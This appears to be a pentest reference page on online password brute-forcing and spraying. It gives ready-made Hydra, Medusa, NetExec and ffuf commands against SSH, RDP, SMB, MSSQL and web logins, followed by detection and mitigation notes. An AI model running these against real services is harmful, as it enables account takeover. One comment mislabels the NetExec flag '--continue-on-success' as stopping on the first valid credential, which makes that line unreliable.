Online Attacks
Overview
Online attacks test credentials directly against live services — SSH, RDP, FTP, web logins, SMB, MSSQL, and more. Unlike offline cracking, online attacks interact with the target and are constrained by network speed, account lockout policies, and detection systems. Hydra and NetExec are the primary tools. Online attacks are slower but do not require hash extraction first.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1110.001 - Brute Force: Password Guessing
- Technique: T1110.003 - Brute Force: Password Spraying
Prerequisites
- Network access to the target service
- Username(s) — known or enumerated
- Password wordlist or single password for spraying
- Understanding of the target's lockout policy (to avoid locking accounts)
Techniques
Hydra
# Hydra
# https://github.com/vanhauser-thc/thc-hydra
# SSH brute-force
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<target>
# SSH with username list
hydra -L users.txt -P passwords.txt ssh://<target>
# FTP
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<target>
# RDP
hydra -l <username> -P /usr/share/wordlists/rockyou.txt rdp://<target>
# SMB
hydra -l <username> -P /usr/share/wordlists/rockyou.txt smb://<target>
# MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<target>
# MSSQL
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://<target>
# HTTP POST form login
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:user=^USER^&pass=^PASS^:Invalid credentials"
# HTTP Basic Auth
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target> http-get /admin/
# Control threads and wait time
hydra -l <username> -P passwords.txt -t 4 -w 30 ssh://<target>
# Stop after first valid password
hydra -l <username> -P passwords.txt -f ssh://<target>
# Verbose output
hydra -l <username> -P passwords.txt -V ssh://<target>
Key hydra flags:
| Flag | Purpose |
|---|---|
-l / -L |
Single username / username list |
-p / -P |
Single password / password list |
-t |
Number of parallel threads (default 16) |
-f |
Stop after first valid login |
-w |
Wait time for a response (default 32s) |
-W |
Wait time between connections per thread |
-V |
Verbose — show each attempt |
-s |
Specify non-default port |
-o |
Output results to file |
Medusa
# Medusa
# https://github.com/jmk-foofus/medusa
# SSH
medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M ssh
# FTP
medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M ftp
# Multiple hosts
medusa -H hosts.txt -u <username> -P passwords.txt -M ssh
# Threads and speed
medusa -h <target> -u <username> -P passwords.txt -M ssh -t 4 -T 10
NetExec (Network Services)
# NetExec
# https://github.com/Pennyw0rth/NetExec
# SMB brute-force
nxc smb <target> -u users.txt -p passwords.txt
# SMB with hash
nxc smb <target> -u <user> -H '<NThash>'
# WinRM
nxc winrm <target> -u users.txt -p passwords.txt
# SSH
nxc ssh <target> -u users.txt -p passwords.txt
# MSSQL
nxc mssql <target> -u users.txt -p passwords.txt
# Stop on first valid credential
nxc smb <target> -u users.txt -p passwords.txt --continue-on-success
# Check if user is admin
nxc smb <target> -u <user> -p <password>
# (Pwn3d!) in output = local admin
Web Application Login
# ffuf — web form brute-force
# https://github.com/ffuf/ffuf
# POST form
ffuf -u http://<target>/login \
-X POST \
-d "username=admin&password=FUZZ" \
-H "Content-Type: application/x-www-form-urlencoded" \
-w /usr/share/wordlists/rockyou.txt \
-fc 401
# With username fuzzing too
ffuf -u http://<target>/login \
-X POST \
-d "username=UFUZZ&password=PFUZZ" \
-H "Content-Type: application/x-www-form-urlencoded" \
-w users.txt:UFUZZ \
-w passwords.txt:PFUZZ \
-fc 401 \
-mode clusterbomb
Detection Methods
Network-Based Detection
- High volume of failed authentication attempts from a single source IP
- Multiple login attempts across different accounts in rapid succession
- Authentication traffic at unusual hours
Host-Based Detection
- Windows Event ID 4625 — failed logon attempts
- Windows Event ID 4771 — Kerberos pre-authentication failed
- Linux: repeated "Failed password" entries in
/var/log/auth.log - Account lockout events
Mitigation Strategies
- Account lockout policies — lock accounts after 3-5 failed attempts (but beware of DoS via intentional lockout)
- Rate limiting — slow down repeated login attempts at the application or network level
- Multi-factor authentication — prevents access even with valid credentials
- Fail2ban / intrusion prevention — automatically block IPs with excessive failed attempts
- Strong password requirements — reduce success rate of dictionary attacks